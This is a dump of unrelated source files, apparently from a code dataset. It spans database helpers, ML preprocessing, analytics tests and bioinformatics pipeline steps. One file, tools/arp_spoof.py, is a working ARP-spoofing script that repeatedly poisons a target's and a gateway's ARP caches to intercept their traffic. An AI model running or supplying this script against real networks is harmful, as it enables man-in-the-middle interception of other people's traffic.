2acd9770cb62478b5a7c4b09ca9b29eae334cd84 | 1,614 | py | Python | backend/db.py | LucioGrimaldi/SimpleFastPythonAPISample | f880d8e9c772c3f09d53ea34ea3478fbaa72da8a | [
"Apache-2.0"
] | null | null | null | backend/db.py | LucioGrimaldi/SimpleFastPythonAPISample | f880d8e9c772c3f09d53ea34ea3478fbaa72da8a | [
"Apache-2.0"
] | null | null | null | backend/db.py | LucioGrimaldi/SimpleFastPythonAPISample | f880d8e9c772c3f09d53ea34ea3478fbaa72da8a | [
"Apache-2.0"
] | null | null | null | from typing import Collection
from model import Employee
import motor.motor_asyncio #MongoDB driver
client = motor.motor_asyncio.AsyncIOMotorClient('mongodb://localhost:27017')
database = client.Employees
collection = database.employees
async def get_employees_by_key_value(key, value):
employees = []
cursor = collection.find({key:value})
async for document in cursor:
employees.append(Employee(**document))
return employees
async def get_all_employees():
employees = []
cursor = collection.find({})
async for document in cursor:
employees.append(Employee(**document))
return employees
async def create_employee(employee):
await collection.insert_one(employee)
return employee
async def update_employee_phone_number(id, phone_number):
await collection.update_one({'id':id},
{'$set': {'phone_number':phone_number}})
document = await collection.find_one({'phone_number':phone_number})
return document
async def update_employee_address(id, new_address):
await collection.update_one({'id':id},
{'$set': {'address':new_address}})
document = await collection.find_one({'address':new_address})
return document
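# Illustrative usage from an async caller such as a FastAPI route (the Employee field
# names are assumptions based on the queries above):
#   await create_employee({'id': 1, 'name': 'Ada', 'phone_number': '555-0100', 'address': 'Old St 1'})
#   await update_employee_address(1, 'New St 2')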
async def remove_employee_by_name(name):
result = await collection.delete_one({'name':name})
if result.deleted_count == 1:
return True
else:
return False
async def remove_employee_by_id(id):
result = await collection.delete_one({'id':id})
if result.deleted_count == 1:
return True
else:
        return False
| 31.038462 | 76 | 0.69145 |
d679487e365d01e5ff07163cbbe23ccd19a0bd2e | 7,068 | py | Python | nnunet/experiment_planning/nnUNet_plan_and_preprocess.py | Jiawei-Yang/TumorCP | 6053c75642fcbc0fb0424320ab3d758f24883b0e | [
"Apache-2.0"
] | 12 | 2021-07-22T15:08:13.000Z | 2022-03-10T08:15:56.000Z | nnunet/experiment_planning/nnUNet_plan_and_preprocess.py | Jiawei-Yang/TumorCP | 6053c75642fcbc0fb0424320ab3d758f24883b0e | [
"Apache-2.0"
] | null | null | null | nnunet/experiment_planning/nnUNet_plan_and_preprocess.py | Jiawei-Yang/TumorCP | 6053c75642fcbc0fb0424320ab3d758f24883b0e | [
"Apache-2.0"
] | 3 | 2021-11-26T06:26:24.000Z | 2022-02-14T01:23:44.000Z | # Copyright 2020 Division of Medical Image Computing, German Cancer Research Center (DKFZ), Heidelberg, Germany
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import sys
sys.path.append('..')
sys.path.append('../..')
import nnunet
from batchgenerators.utilities.file_and_folder_operations import *
from nnunet.experiment_planning.DatasetAnalyzer import DatasetAnalyzer
from nnunet.experiment_planning.utils import crop
from nnunet.paths import *
import shutil
from nnunet.utilities.task_name_id_conversion import convert_id_to_task_name
from nnunet.preprocessing.sanity_checks import verify_dataset_integrity
from nnunet.training.model_restore import recursive_find_python_class
def main():
import argparse
parser = argparse.ArgumentParser()
parser.add_argument("-t", "--task_ids", nargs="+", help="List of integers belonging to the task ids you wish to run"
" experiment planning and preprocessing for. Each of these "
"ids must, have a matching folder 'TaskXXX_' in the raw "
"data folder")
parser.add_argument("-pl3d", "--planner3d", type=str, default="ExperimentPlanner3D_v21",
help="Name of the ExperimentPlanner class for the full resolution 3D U-Net and U-Net cascade. "
"Default is ExperimentPlanner3D_v21. Can be 'None', in which case these U-Nets will not be "
"configured")
parser.add_argument("-pl2d", "--planner2d", type=str, default="ExperimentPlanner2D_v21",
help="Name of the ExperimentPlanner class for the 2D U-Net. Default is ExperimentPlanner2D_v21. "
"Can be 'None', in which case this U-Net will not be configured")
parser.add_argument("-no_pp", action="store_true",
help="Set this flag if you dont want to run the preprocessing. If this is set then this script "
"will only run the experiment planning and create the plans file")
parser.add_argument("-tl", type=int, required=False, default=8,
help="Number of processes used for preprocessing the low resolution data for the 3D low "
"resolution U-Net. This can be larger than -tf. Don't overdo it or you will run out of "
"RAM")
parser.add_argument("-tf", type=int, required=False, default=8,
help="Number of processes used for preprocessing the full resolution data of the 2D U-Net and "
"3D U-Net. Don't overdo it or you will run out of RAM")
parser.add_argument("--verify_dataset_integrity", required=False, default=False, action="store_true",
help="set this flag to check the dataset integrity. This is useful and should be done once for "
"each dataset!")
args = parser.parse_args()
task_ids = args.task_ids
dont_run_preprocessing = args.no_pp
tl = args.tl
tf = args.tf
planner_name3d = args.planner3d
planner_name2d = args.planner2d
if planner_name3d == "None":
planner_name3d = None
if planner_name2d == "None":
planner_name2d = None
# we need raw data
tasks = []
for i in task_ids:
i = int(i)
task_name = convert_id_to_task_name(i)
if args.verify_dataset_integrity:
verify_dataset_integrity(join(nnUNet_raw_data, task_name))
crop(task_name, False, tf)
tasks.append(task_name)
search_in = join(nnunet.__path__[0], "experiment_planning")
if planner_name3d is not None:
planner_3d = recursive_find_python_class([search_in], planner_name3d, current_module="nnunet.experiment_planning")
if planner_3d is None:
raise RuntimeError("Could not find the Planner class %s. Make sure it is located somewhere in "
"nnunet.experiment_planning" % planner_name3d)
else:
planner_3d = None
if planner_name2d is not None:
planner_2d = recursive_find_python_class([search_in], planner_name2d, current_module="nnunet.experiment_planning")
if planner_2d is None:
raise RuntimeError("Could not find the Planner class %s. Make sure it is located somewhere in "
"nnunet.experiment_planning" % planner_name2d)
else:
planner_2d = None
for t in tasks:
print("\n\n\n", t)
cropped_out_dir = os.path.join(nnUNet_cropped_data, t)
preprocessing_output_dir_this_task = os.path.join(preprocessing_output_dir, t)
#splitted_4d_output_dir_task = os.path.join(nnUNet_raw_data, t)
#lists, modalities = create_lists_from_splitted_dataset(splitted_4d_output_dir_task)
        # we need to figure out if we need the intensity properties. We collect them only if one of the modalities is CT
dataset_json = load_json(join(cropped_out_dir, 'dataset.json'))
modalities = list(dataset_json["modality"].values())
collect_intensityproperties = True if (("CT" in modalities) or ("ct" in modalities)) else False
dataset_analyzer = DatasetAnalyzer(cropped_out_dir, overwrite=False, num_processes=tf) # this class creates the fingerprint
_ = dataset_analyzer.analyze_dataset(collect_intensityproperties) # this will write output files that will be used by the ExperimentPlanner
maybe_mkdir_p(preprocessing_output_dir_this_task)
shutil.copy(join(cropped_out_dir, "dataset_properties.pkl"), preprocessing_output_dir_this_task)
shutil.copy(join(nnUNet_raw_data, t, "dataset.json"), preprocessing_output_dir_this_task)
threads = (tl, tf)
print("number of threads: ", threads, "\n")
if planner_3d is not None:
exp_planner = planner_3d(cropped_out_dir, preprocessing_output_dir_this_task)
exp_planner.plan_experiment()
if not dont_run_preprocessing: # double negative, yooo
exp_planner.run_preprocessing(threads)
if planner_2d is not None:
exp_planner = planner_2d(cropped_out_dir, preprocessing_output_dir_this_task)
exp_planner.plan_experiment()
if not dont_run_preprocessing: # double negative, yooo
exp_planner.run_preprocessing(threads)
if __name__ == "__main__":
main()
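# Example invocation (illustrative; the task id is a placeholder and must match a
# TaskXXX_ folder in the raw data directory, as described by the -t help text above):
#   python nnUNet_plan_and_preprocess.py -t 4 --verify_dataset_integrity -tl 8 -tf 8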
| 49.426573 | 148 | 0.664261 |
8ec9f0df25d86c7a24a57c648be6eb76f416443d | 1,757 | py | Python | bin/syncdb.py | srvz/zkdash | f705c72983694bb6437cb2c2e2cdb72122d151d1 | [
"Apache-2.0"
] | null | null | null | bin/syncdb.py | srvz/zkdash | f705c72983694bb6437cb2c2e2cdb72122d151d1 | [
"Apache-2.0"
] | null | null | null | bin/syncdb.py | srvz/zkdash | f705c72983694bb6437cb2c2e2cdb72122d151d1 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
'''
Copyright (c) 2014, 掌阅科技 (Zhangyue Technology)
All rights reserved.
Summary: syncdb.py
Author: zhuangshixiong
Created: 2015-10-10
'''
# pylint: disable=import-error, unused-variable, protected-access
import sys
import os
import pkgutil
sys.path.append(os.path.dirname(os.path.split(os.path.realpath(__file__))[0]))
import model.db
from model.db.base import ZKDASH_DB
from lib.utils import find_subclasses
def sync_db():
"""sync db
"""
# firstly, import all modules of model.db package
prefix = model.db.__name__ + "."
for importer, modname, ispkg in pkgutil.iter_modules(model.db.__path__, prefix):
__import__(modname)
# then, find all subclasses of WARSHIP_DB.Model
models = find_subclasses(ZKDASH_DB.Model)
for mod in models:
if mod.table_exists():
print "table exists: %s, continue!" % mod._meta.db_table
continue
mod.create_table()
print "created table: %s" % mod._meta.db_table
def reset_db():
"""reset db
"""
# firstly, import all modules of model.db package
prefix = model.db.__name__ + "."
for importer, modname, ispkg in pkgutil.iter_modules(model.db.__path__, prefix):
__import__(modname)
# then, find all subclasses of WARSHIP_DB.Model
models = find_subclasses(ZKDASH_DB.Model)
for mod in models:
if mod.table_exists():
print "table exists: %s, drop it!" % mod._meta.db_table
mod.drop_table()
mod.create_table()
print "created table: %s" % mod._meta.db_table
if __name__ == '__main__':
args = sys.argv
cmd = None
if len(args) > 1:
cmd = args[1]
if cmd == 'reset_db':
reset_db()
else:
sync_db()
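# Usage (illustrative):
#   python bin/syncdb.py            # create any tables that do not exist yet
#   python bin/syncdb.py reset_db   # drop and recreate every table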
| 26.223881 | 84 | 0.642573 |
a909c9d21100ad59c91ca572650b303e147a49c5 | 426 | py | Python | test_scripts/stop_stream.py | luozh05/Doc | 3471a9c8578d6530abf5c3ee3100488b0dc1e447 | [
"Apache-2.0"
] | null | null | null | test_scripts/stop_stream.py | luozh05/Doc | 3471a9c8578d6530abf5c3ee3100488b0dc1e447 | [
"Apache-2.0"
] | null | null | null | test_scripts/stop_stream.py | luozh05/Doc | 3471a9c8578d6530abf5c3ee3100488b0dc1e447 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
import socket
import sys
import json
import json_over_tcp
from json_over_tcp import send_and_receive_msg
if __name__ == '__main__':
    # test stop stream: valid input, case 0
cmd = {}
cmd["cmd-stop-stream"] = "NULL"
cmd_string = json.dumps(cmd)
result = send_and_receive_msg(cmd_string)
if result == False:
print "case 0 failed!"
exit()
print "case 0 succeed!"
| 22.421053 | 46 | 0.673709 |
637ad35cbb18e683a7236f25616659173215035b | 4,366 | py | Python | ee/tasks/test/test_send_license_usage.py | dorucioclea/posthog | a7e792c3fc5c1abc70d8167e1ead12d4ea24f17a | [
"MIT"
] | 7,409 | 2020-02-09T23:18:10.000Z | 2022-03-31T22:36:25.000Z | ee/tasks/test/test_send_license_usage.py | dorucioclea/posthog | a7e792c3fc5c1abc70d8167e1ead12d4ea24f17a | [
"MIT"
] | 5,709 | 2020-02-09T23:26:13.000Z | 2022-03-31T20:20:01.000Z | ee/tasks/test/test_send_license_usage.py | dorucioclea/posthog | a7e792c3fc5c1abc70d8167e1ead12d4ea24f17a | [
"MIT"
] | 647 | 2020-02-13T17:50:55.000Z | 2022-03-31T11:24:19.000Z | from unittest.mock import ANY, patch
from uuid import uuid4
from freezegun import freeze_time
from ee.api.test.base import LicensedTestMixin
from ee.clickhouse.models.event import create_event
from ee.clickhouse.util import ClickhouseDestroyTablesMixin
from ee.models.license import License
from ee.tasks.send_license_usage import send_license_usage
from posthog.models import organization
from posthog.models.team import Team
from posthog.test.base import APIBaseTest
def _create_event(**kwargs):
kwargs.update({"event_uuid": uuid4()})
create_event(**kwargs)
class SendLicenseUsageTest(LicensedTestMixin, ClickhouseDestroyTablesMixin, APIBaseTest):
@freeze_time("2021-10-10T23:01:00Z")
@patch("posthoganalytics.capture")
@patch("requests.post")
def test_send_license_usage(self, mock_post, mock_capture):
team2 = Team.objects.create(organization=self.organization)
_create_event(event="$pageview", team=self.team, distinct_id=1, timestamp="2021-10-08T14:01:01Z")
_create_event(event="$pageview", team=self.team, distinct_id=1, timestamp="2021-10-09T12:01:01Z")
_create_event(event="$pageview", team=self.team, distinct_id=1, timestamp="2021-10-09T13:01:01Z")
_create_event(
event="$$internal_metrics_shouldnt_be_billed",
team=self.team,
distinct_id=1,
timestamp="2021-10-09T13:01:01Z",
)
_create_event(event="$pageview", team=team2, distinct_id=1, timestamp="2021-10-09T14:01:01Z")
_create_event(event="$pageview", team=self.team, distinct_id=1, timestamp="2021-10-10T14:01:01Z")
send_license_usage()
mock_post.assert_called_once_with(
"https://license.posthog.com/licenses/usage",
data={"date": "2021-10-09", "key": self.license.key, "events_count": 3},
)
mock_capture.assert_called_once_with(
self.user.distinct_id,
"send license usage data",
{"date": "2021-10-09", "events_count": 3, "license_keys": ["enterprise"], "organization_name": "Test"},
groups={"instance": ANY, "organization": str(self.organization.id)},
)
@freeze_time("2021-10-10T23:01:00Z")
@patch("posthoganalytics.capture")
@patch("ee.tasks.send_license_usage.sync_execute", side_effect=Exception())
def test_send_license_error(self, mock_post, mock_capture):
team2 = Team.objects.create(organization=self.organization)
_create_event(event="$pageview", team=self.team, distinct_id=1, timestamp="2021-10-08T14:01:01Z")
_create_event(event="$pageview", team=self.team, distinct_id=1, timestamp="2021-10-09T12:01:01Z")
_create_event(event="$pageview", team=self.team, distinct_id=1, timestamp="2021-10-09T13:01:01Z")
_create_event(
event="$$internal_metrics_shouldnt_be_billed",
team=self.team,
distinct_id=1,
timestamp="2021-10-09T13:01:01Z",
)
_create_event(event="$pageview", team=team2, distinct_id=1, timestamp="2021-10-09T14:01:01Z")
_create_event(event="$pageview", team=self.team, distinct_id=1, timestamp="2021-10-10T14:01:01Z")
send_license_usage()
mock_capture.assert_called_once_with(
self.user.distinct_id,
"send license usage data error",
{"error": "", "date": "2021-10-09", "organization_name": "Test"},
groups={"instance": ANY, "organization": str(self.organization.id)},
)
class SendLicenseUsageNoLicenseTest(APIBaseTest):
@freeze_time("2021-10-10T23:01:00Z")
@patch("requests.post")
def test_no_license(self, mock_post):
# Same test, we just don't include the LicensedTestMixin so no license
_create_event(event="$pageview", team=self.team, distinct_id=1, timestamp="2021-10-08T14:01:01Z")
_create_event(event="$pageview", team=self.team, distinct_id=1, timestamp="2021-10-09T12:01:01Z")
_create_event(event="$pageview", team=self.team, distinct_id=1, timestamp="2021-10-09T13:01:01Z")
_create_event(event="$pageview", team=self.team, distinct_id=1, timestamp="2021-10-09T14:01:01Z")
_create_event(event="$pageview", team=self.team, distinct_id=1, timestamp="2021-10-10T14:01:01Z")
send_license_usage()
self.assertEqual(mock_post.call_count, 0)
| 47.978022 | 115 | 0.688044 |
1d83a31a5e2e08ae1de385158bc4b910ae01354b | 1,091 | py | Python | CustomUsers/migrations/0001_initial.py | PopaGabriel/Food-Ecommerce-Site | 7f7cde94939f02f13df5afa865cddc72981481e2 | [
"MIT"
] | 1 | 2021-08-12T08:46:56.000Z | 2021-08-12T08:46:56.000Z | CustomUsers/migrations/0001_initial.py | PopaGabriel/Food-Ecommerce-Site | 7f7cde94939f02f13df5afa865cddc72981481e2 | [
"MIT"
] | null | null | null | CustomUsers/migrations/0001_initial.py | PopaGabriel/Food-Ecommerce-Site | 7f7cde94939f02f13df5afa865cddc72981481e2 | [
"MIT"
] | null | null | null | # Generated by Django 3.2.5 on 2021-09-03 15:19
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='BaseCustomUser',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('password', models.CharField(max_length=128, verbose_name='password')),
('last_login', models.DateTimeField(blank=True, null=True, verbose_name='last login')),
('email', models.EmailField(max_length=255, unique=True)),
('username', models.CharField(max_length=255)),
('cnp', models.CharField(max_length=15)),
('is_active', models.BooleanField(default=True)),
('staff', models.BooleanField(default=False)),
('admin', models.BooleanField(default=False)),
],
options={
'abstract': False,
},
),
]
993 | py | Python | image.py | Jax-Carstensen/Battleship | ["MIT"]
from vector2 import *
import pygame
class Image:
def __init__(self, src, draw_width=64, draw_height=64):
self.src = src
self.image = pygame.image.load(self.src).convert_alpha()
self.rescale(Vector2(draw_width, draw_height))
self.image_rect = self.image.get_rect()
self.dimensions = Vector2(self.image.get_width(), self.image.get_height())
def rescale(self, new_dimensions):
if self.image.get_width() != self.image.get_height():
x = new_dimensions.x
y = x
new_dimensions = Vector2(int(new_dimensions.x), int(round(new_dimensions.x / self.image.get_width() * self.image.get_height())))
self.image = pygame.transform.scale(self.image, new_dimensions.tuple()).convert_alpha()
self.dimensions = Vector2(self.image.get_width(), self.image.get_height())
def draw(self, screen, position, flip=False):
if flip:
screen.blit(pygame.transform.flip(self.image, True, False), position.tuple())
else:
			screen.blit(self.image, position.tuple())
85 | py | Python | backend/blame/apps.py | StichtingIAPC/swipe | ["BSD-3-Clause-Clear"]
from django.apps import AppConfig
class BlameConfig(AppConfig):
name = 'blame'
6,027 | py | Python | conflowgen/posthoc_analyses/yard_capacity_analysis.py | 1grasse/conflowgen | ["MIT"]
from __future__ import annotations
import datetime
from typing import Dict, Tuple, List, Collection, Union
from conflowgen.domain_models.data_types.storage_requirement import StorageRequirement
from conflowgen.domain_models.arrival_information import TruckArrivalInformationForDelivery, \
TruckArrivalInformationForPickup
from conflowgen.domain_models.container import Container
from conflowgen.domain_models.data_types.container_length import ContainerLength
from conflowgen.domain_models.vehicle import LargeScheduledVehicle, Truck
from conflowgen.posthoc_analyses.abstract_posthoc_analysis import AbstractPostHocAnalysis, get_hour_based_time_window, \
get_hour_based_range
class YardCapacityAnalysis(AbstractPostHocAnalysis):
"""
This analysis can be run after the synthetic data has been generated.
The analysis returns a data structure that can be used for generating reports (e.g., in text or as a figure)
as it is the case with :class:`.YardCapacityAnalysisReport`.
"""
@staticmethod
def get_used_yard_capacity_over_time(
storage_requirement: Union[str, Collection, StorageRequirement] = "all"
) -> Dict[datetime.datetime, float]:
"""
For each hour, the containers entering and leaving the yard are checked. Based on this, the required yard
capacity in TEU can be deduced - it is simply the maximum of these values. In addition, with the parameter
``storage_requirement`` the yard capacity can be filtered, e.g. to only include standard containers, empty
containers, or any other kind of subset.
Please be aware that this method slightly overestimates the required capacity. If one container leaves the yard
at the beginning of the respective time window and another container enters the yard at the end of the same time
window, still the TEU equivalence of both containers is recorded as the required yard capacity. Obviously the
entering container could use the same slot as the container which entered later. This minor inaccuracy might be
of little importance because no yard should be planned that tight. The benefit is that it further allows a
faster computation.
Args:
storage_requirement: One of
``"all"``,
a collection of :class:`StorageRequirement` enum values (as a list, set, or similar), or
a single :class:`StorageRequirement` enum value.
Returns:
A series of the used yard capacity in TEU over the time.
"""
container_stays: List[Tuple[datetime.datetime, datetime.datetime, float]] = []
container: Container
if storage_requirement == "all":
selected_containers = Container.select()
else:
if storage_requirement in set(StorageRequirement):
selected_containers = Container.select().where(
Container.storage_requirement == storage_requirement
)
else: # assume it is some kind of collection (list, set, ...)
selected_containers = Container.select().where(
Container.storage_requirement << storage_requirement
)
for container in selected_containers:
container_enters_yard: datetime.datetime
container_leaves_yard: datetime.datetime
if container.delivered_by_truck is not None:
truck: Truck = container.delivered_by_truck
arrival_time_information: TruckArrivalInformationForDelivery = \
truck.truck_arrival_information_for_delivery
container_enters_yard = arrival_time_information.realized_container_delivery_time
elif container.delivered_by_large_scheduled_vehicle is not None:
vehicle: LargeScheduledVehicle = container.delivered_by_large_scheduled_vehicle
container_enters_yard = vehicle.scheduled_arrival
else:
raise Exception(f"Faulty data: {container}")
if container.picked_up_by_truck is not None:
truck: Truck = container.picked_up_by_truck
arrival_time_information: TruckArrivalInformationForPickup = \
truck.truck_arrival_information_for_pickup
container_leaves_yard = arrival_time_information.realized_container_pickup_time
elif container.picked_up_by_large_scheduled_vehicle is not None:
vehicle: LargeScheduledVehicle = container.picked_up_by_large_scheduled_vehicle
container_leaves_yard = vehicle.scheduled_arrival
else:
raise Exception(f"Faulty data: {container}")
teu_factor_of_container = ContainerLength.get_factor(container.length)
container_stays.append((container_enters_yard, container_leaves_yard, teu_factor_of_container))
if len(container_stays) == 0:
return {}
first_arrival, _, _ = min(container_stays, key=lambda x: x[0])
_, last_pickup, _ = max(container_stays, key=lambda x: x[1])
first_time_window = get_hour_based_time_window(first_arrival) - datetime.timedelta(hours=1)
last_time_window = get_hour_based_time_window(last_pickup) + datetime.timedelta(hours=1)
used_yard_capacity: Dict[datetime.datetime, float] = {
time_window: 0
for time_window in get_hour_based_range(first_time_window, last_time_window)
}
for (container_enters_yard, container_leaves_yard, teu_factor_of_container) in container_stays:
time_window_at_entering = get_hour_based_time_window(container_enters_yard)
time_window_at_leaving = get_hour_based_time_window(container_leaves_yard)
for time_window in get_hour_based_range(time_window_at_entering, time_window_at_leaving):
used_yard_capacity[time_window] += teu_factor_of_container
return used_yard_capacity
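# --- Illustrative usage sketch added by the editor; not part of the original module. ---
# It relies only on the static method defined above. Running it assumes the ConFlowGen
# database has already been populated elsewhere; the peak-detection logic is an example.
def _example_peak_yard_usage():
    """Return (time, TEU) of the hour with the highest yard utilisation (illustrative only)."""
    used_capacity = YardCapacityAnalysis.get_used_yard_capacity_over_time()  # all containers
    if not used_capacity:
        return None
    peak_time, peak_teu = max(used_capacity.items(), key=lambda item: item[1])
    return peak_time, peak_teu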
3,280 | py | Python | short-read-mngs/idseq-dag/idseq_dag/steps/run_gsnap_filter.py | lynnlangit/idseq-workflows | ["MIT"]
import os
import subprocess
from idseq_dag.engine.pipeline_step import PipelineCountingStep
from idseq_dag.exceptions import InsufficientReadsError
import idseq_dag.util.command as command
import idseq_dag.util.command_patterns as command_patterns
import idseq_dag.util.convert as convert
import idseq_dag.util.log as log
import idseq_dag.util.count as count
from idseq_dag.util.s3 import fetch_reference
class PipelineStepRunGsnapFilter(PipelineCountingStep):
""" Regardless of specified “host” organism, it is essential to remove all potentially-human
sequences for privacy reasons. Thus, a final GSNAP alignment is performed against the human
genome for samples from all host types.
```
gsnapl
-A sam
--batch=0
--use-shared-memory=0
--gmap-mode=all
--npaths=1
--ordered
-t 32
--max-mismatches=40
-D {gsnap_base_dir}
-d {gsnap_index_name}
-o {output_sam_file}
{input_fas}
```
Two input FASTAs means paired reads.
The GSNAP documentation can be found [here](http://research-pub.gene.com/gmap/src/README).
"""
# Two input FASTAs means paired reads.
def input_fas(self):
return self.input_files_local[0][0:2]
def validate_input_files(self):
if not count.files_have_min_reads(self.input_fas(), 1):
raise InsufficientReadsError("Insufficient reads")
def run(self):
input_fas = self.input_fas()
output_fas = self.output_files_local()
output_sam_file = os.path.join(self.output_dir_local,
self.additional_attributes["output_sam_file"])
self.additional_output_files_hidden.append(output_sam_file)
genome_dir = fetch_reference(self.additional_files["gsnap_genome"],
self.ref_dir_local,
allow_s3mi=True,
auto_untar=True)
gsnap_base_dir = os.path.dirname(genome_dir)
gsnap_index_name = os.path.basename(genome_dir)
# Hack to determine gsnap vs gsnapl
error_message = subprocess.run(
['gsnapl', '-D', gsnap_base_dir, '-d', gsnap_index_name],
input='>'.encode('utf-8'),
stderr=subprocess.PIPE,
stdout=subprocess.PIPE
).stderr
gsnap_exe = "gsnap" if 'please run gsnap instead' in error_message.decode('utf-8') else "gsnapl"
# Run Gsnap
gsnap_params = [
'-A', 'sam', '--batch=0', '--use-shared-memory=0',
'--gmap-mode=all', '--npaths=1', '--ordered', '-t', 32,
'--max-mismatches=40', '-D', gsnap_base_dir, '-d', gsnap_index_name,
'-o',
output_sam_file
] + input_fas
command.execute(
command_patterns.SingleCommand(
cmd=gsnap_exe,
args=gsnap_params
)
)
log.write("Finished GSNAP alignment.")
# Extract out unmapped files from sam
if len(input_fas) == 2:
convert.generate_unmapped_pairs_from_sam(
output_sam_file, output_fas)
else:
convert.generate_unmapped_singles_from_sam(
output_sam_file, output_fas[0])
2,632 | py | Python | lingofunk_regenerate/tests.py | lingofunk/lingofunk-regenerate | ["MIT"]
import torch
import numpy as np
from lingofunk_regenerate.utils import log as _log
def log(text):
_log(text, prefix="tests: ")
def test_generate_text_of_sentiment(model, dataset):
log("Text generation of given sentiment\n")
# Samples latent and conditional codes randomly from prior
z = model.sample_z_prior(1)
c = model.sample_c_prior(1)
# Generate positive sample given z
c[0, 0], c[0, 1] = 1, 0
_, c_idx = torch.max(c, dim=1)
sample_idxs = model.sample_sentence(z, c, temp=0.1)
log("Sentiment: {}".format(dataset.idx2label(int(c_idx))))
log("Generated: {}\n".format(dataset.idxs2sentence(sample_idxs)))
# Generate negative sample from the same z
c[0, 0], c[0, 1] = 0, 1
_, c_idx = torch.max(c, dim=1)
sample_idxs = model.sample_sentence(z, c, temp=0.8)
log("Sentiment: {}".format(dataset.idx2label(int(c_idx))))
log("Generated: {}\n".format(dataset.idxs2sentence(sample_idxs)))
def test_interpolate(model, dataset, gpu=False):
log("Interpolation of z\n")
c = model.sample_c_prior(1)
z1 = model.sample_z_prior(1).view(1, 1, model.z_dim)
z1 = z1.cuda() if gpu else z1
z2 = model.sample_z_prior(1).view(1, 1, model.z_dim)
z2 = z2.cuda() if gpu else z2
# Interpolation coefficients
alphas = np.linspace(0, 1, 10)
for alpha in alphas:
z = float(1 - alpha) * z1 + float(alpha) * z2
sample_idxs = model.sample_sentence(z, c, temp=0.1)
sample_sent = dataset.idxs2sentence(sample_idxs)
log("{}".format(sample_sent))
def test_encode_text_add_noize_and_decode(
model, dataset, sentence="I love to eat in Las Vegas", use_c_prior=True
):
log("Encode, add noize & decode\n")
log("Sentence: " + sentence)
mbsize = 1
sentence = dataset.sentence2idxs(sentence)
sentence = np.array(sentence).reshape(-1, mbsize)
sentence = torch.from_numpy(sentence)
# Encoder: sentence -> z
mu, logvar = model.forward_encoder(sentence)
if use_c_prior:
c = model.sample_c_prior(mbsize)
else:
c = model.forward_discriminator(sentence.transpose(0, 1))
# c[0, 0], c[0, 1] = 1, 0
sigma = 0.001
temp = 0.001
for i in range(10):
z = model.sample_z(mu, logvar)
z_noized = z.type(torch.FloatTensor) + torch.from_numpy(
np.random.randn(z.size(0), z.size(1))
).type(torch.FloatTensor) * (0 if i == 0 else sigma)
sampled = model.sample_sentence(z_noized, c, temp=temp)
sampled_sentence = dataset.idxs2sentence(sampled)
print("Sampled sentence: " + sampled_sentence + "\n")
1,102 | py | Python | tools/arp_spoof.py | s3q/backdoor_c | ["Apache-2.0"]
import sys
import scapy.all as scapy
import argparse
from time import sleep
def get_arguments():
parser = argparse.ArgumentParser()
parser.add_argument('-t', '--target', dest='target', help='Specify target ip')
parser.add_argument('-g', '--gateway', dest='gateway', help='Specify spoof ip')
return parser.parse_args()
def get_mac(ip):
responses, unanswered = scapy.srp(scapy.Ether(dst="FF:FF:FF:FF:FF:FF")/scapy.ARP(pdst=ip), timeout=1, retry=2, verbose=False)
for s,r in responses:
return r[scapy.Ether].src
return None
def spoof(target_ip, spoof_ip):
target_mac = get_mac(target_ip)
packet = scapy.ARP(op=2, pdst=target_ip, hwdst=target_mac, psrc=spoof_ip)
scapy.send(packet, verbose=False)
arguments = get_arguments()
sent_packet=0
try:
while True:
spoof(arguments.target, arguments.gateway)
spoof(arguments.gateway, arguments.target)
sent_packet+=2
        print('\r[+] - Sent packet : ' + str(sent_packet), end='')
sys.stdout.flush()
sleep(1)
except KeyboardInterrupt:
    print('[-] - Ctrl + C detected ...')
1,592 | py | Python | recipes/engine_tests/multiple_placeholders.py | engeg/recipes-py | ["Apache-2.0"]
# Copyright 2019 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Tests error checking around multiple placeholders in a single step."""
from recipe_engine.post_process import DropExpectation
DEPS = [
'assertions',
'json',
'step',
]
def RunSteps(api):
# illegal; multiple unnamed placeholders of the same kind "json.output".
with api.assertions.assertRaisesRegexp(
ValueError, r'conflicting .*: \[\'json\.output unnamed\'\]'):
api.step('step 1', ['cmd', api.json.output(), api.json.output()])
# illegal; multiple named placeholders with the same name
with api.assertions.assertRaisesRegexp(
ValueError, r'conflicting .*: \["json\.output named \'bob\'"\]'):
api.step('step 2', [
'cmd',
api.json.output(name='bob'),
api.json.output(name='bob'),
])
# legal; multiple named placeholders with unique names
result = api.step('step 3', [
'cmd',
api.json.output(name='bob'),
api.json.output(name='charlie'),
])
api.assertions.assertEqual(result.json.outputs['bob'], 1)
api.assertions.assertEqual(result.json.outputs['charlie'], 2)
# legal; multiple of the same input placeholders
result = api.step('step 4', [
'cmd',
api.json.input('bob'),
api.json.input('charlie'),
])
def GenTests(api):
yield (
api.test('basic')
+ api.step_data(
'step 3',
api.json.output(1, name='bob'),
api.json.output(2, name='charlie'),
)
+ api.post_process(DropExpectation)
)
| 26.983051 | 74 | 0.652638 |
2b6de2fc2ecb27febe44479b8954066a0ab7f415 | 6,973 | py | Python | parsers.py | Dataliberate/bibschemaorg | 5548293ddf79e94153b70ae3eefa9ee2adcd2e13 | [
"Apache-2.0"
] | 2 | 2015-11-19T03:53:09.000Z | 2016-11-23T10:45:33.000Z | parsers.py | Dataliberate/bibschemaorg | 5548293ddf79e94153b70ae3eefa9ee2adcd2e13 | [
"Apache-2.0"
] | 1 | 2015-04-28T15:54:20.000Z | 2015-04-29T23:13:13.000Z | parsers.py | Dataliberate/bibschemaorg | 5548293ddf79e94153b70ae3eefa9ee2adcd2e13 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
#
import webapp2
import re
from google.appengine.ext import db
from google.appengine.ext import blobstore
from google.appengine.ext.webapp import blobstore_handlers
import xml.etree.ElementTree as ET
import logging
import api
def MakeParserOfType (format, webapp):
if (format == 'mcf') :
